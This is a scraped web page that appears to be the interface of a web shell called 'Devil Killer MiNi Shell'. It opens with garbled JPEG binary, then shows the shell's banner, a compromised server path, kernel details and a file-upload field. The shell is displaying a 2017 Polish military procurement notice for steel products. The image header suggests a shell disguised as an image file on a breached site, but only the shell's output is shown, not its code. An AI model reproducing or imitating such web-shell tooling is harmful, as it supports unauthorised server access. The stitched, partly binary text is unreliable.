JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170331/55912-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.3rblog.wp.mil.pl' target='_blank'>http://www.3rblog.wp.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 55912 - 2017
              z dnia 2017-03-31 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Dostawa wyrobów hutniczych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>3 Regionalna Baza Logistyczna, krajowy numer identyfikacyjny
              12139041500000, ul.
              ul. Montelupich 
              3,
              30-901  
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              261 137 554, e-mail
              3rblog.zamowieniapubliczne@ron.mil.pl, faks
              261 137 553.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka wojskowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.3rblog.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pocztą<br />
                Adres:
                <br />3 Regionalna Baza Logistyczna, ul. Montelupich 3, 30-901 Kraków, bud. 28 - kancelaria jawna </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa wyrobów hutniczych<br /><b>Numer referencyjny: </b>60/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa wyrobów hutniczych. Przedmiot zamówienia został podzielony na 10 zadań:
zadanie 1: Blachy stalowe dla RWT Żurawica;
zadanie 2: Blachy dla RWT Żurawica;
zadanie 3: Blachy dla RWT Rzeszów;
zadanie 4: Kształtowniki i kątowniki dla RWT Żurawica;
zadanie 5: Rury dla RWT Żurawica;
zadanie 6: Rury dla RWT Rzeszów;
zadanie 7: Pręty dla RWT Żurawica;
zadanie 8: Wyroby hutnicze - pozostałe dla RWT Żurawica;
zadanie 9: Wyroby hutnicze - pozostałe dla RWT Rzeszów;
zadnie 10: Wyroby hutnicze - pozostałe dla SR Lublin. <br /><br /><b>II.5) Główny kod CPV: </b>14622000-7<br /><b> Dodatkowe kody CPV:</b>31711140-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/05/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy Pzp; Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert w niniejszym postępowaniu. W przypadku wykonawców wspólnie ubiegających się o zamówienie dokument, o którym mowa powyżej składa każdy z wykonawców wspólnie ubiegających się o zamówienie. </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy Pzp. W przypadku przynależności do tej samej grupy kapitałowej, wraz ze złożeniem oświadczenia, Wykonawca może złożyć dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zgodnie z treścią art. 144 ust. 1 pkt 1 ustawy prawo zamówień publicznych, Zamawiający dopuszcza możliwość wprowadzania istotnych zmian 
w umowie, na mocy porozumienia stron w następujących przypadkach i na następujących warunkach:
1)Zmiany terminów, o których mowa w umowie -  gdy z powodu siły wyższej nie jest możliwe zachowanie terminów, o których mowa w umowie, o czas w którym z powodu wystąpienia siły wyższej umowa nie mogła być realizowana; za siłę wyższą uważa się w szczególności strajki, zamieszki, działania wojenne, zamknięcie granic, pożar, powódź, trzęsienia ziemi i inne klęski żywiołowe, zmianę przepisów prawnych, działania organów państwowych, samorządowych i instytucji cywilnych 
i wojskowych, których współdziałanie jest niezbędne w celu realizacji niniejszej umowy, a których udział w realizacji umowy wynika z przepisów prawa, akty o charakterze terrorystycznym;
2)przedłużenia terminu wykonania umowy  o okres trwania postępowania odwoławczego przed Krajową Izbą Odwoławczą lub sądem powszechnym, w przypadku gdy zostało wniesione odwołanie w postępowaniu o udzielenie zamówienia publicznego; dla celów niniejszej umowy przyjmuje się, że momentem rozpoczęcia postępowania odwoławczego jest dzień doręczenia Zamawiającemu odwołania zaś momentem zakończenia dzień uznania odwołania przez Zamawiającego bądź dzień wydania postanowienia lub wyroku przez KIO; 
3)zmiany wynagrodzenia  w przypadku zmiany przepisów prawnych ( np. VAT) jeżeli wpływa ona na wysokość należnego wykonawcy wynagrodzenia  zgodnie ze zmienionymi przepisami;
4)zmniejszenia ceny jednostkowej netto- w każdym czasie na wniosek Wykonawcy, zgodnie z tym wnioskiem;
5)zmniejszenia należnego Wykonawcy wynagrodzenia  w każdym czasie za jego zgodą, a także w przypadku dokonania w umowie zmian, 
o których mowa w pkt od 6 do 8;
6)zmiany poszczególnych pozycji asortymentowych stanowiących przedmiot umowy  gdy przedmiot umowy nie będzie dostępny na rynku pod warunkiem, że wyrób zamienny będzie równoważny z wymaganym przez Zamawiającego w specyfikacji istotnych warunków zamówienia oraz że cena jednostkowa netto nie ulegnie zwiększeniu; 
7)zmiany pozycji asortymentowych stanowiących przedmiot umowy  w każdym czasie, kiedy Wykonawca zaoferuje Zamawiającemu wyrób 
o parametrach lepszych aniżeli zaoferowany w ofercie, pod warunkiem, że cena jednostkowa netto nie ulegnie podwyższeniu;
8)rezygnacji z dostarczenia poszczególnych pozycji asortymentowych  w każdym czasie na wniosek Zamawiającego za zgodą Wykonawcy;
9)innych postanowień umowy  jeżeli ich zmiana jest konieczna w związku ze zmianą przepisów prawa, zmianą decyzji wydawanych przez Ministra Obrony Narodowej bądź zmianą wytycznych (poleceń) przełożonych Zamawiającego, o ile powyższe zmiany mają wpływ na wykonanie zawartej umowy  zgodnie ze zmienionymi przepisami, wytycznymi bądź poleceniami
2.Zamawiający dopuszcza możliwość zmiany umowy w razie zaistnienia sytuacji określonych w art. 144 ust. 1 pkt od 2 do 6 ustawy  prawo zamówień publicznych.
3.Za zmiany nieistotne uważa się między innymi ale nie wyłącznie zmiany  w symbolu katalogowym, zmiany symbolu indeksowego JIM, zmianę Odbiorcy.
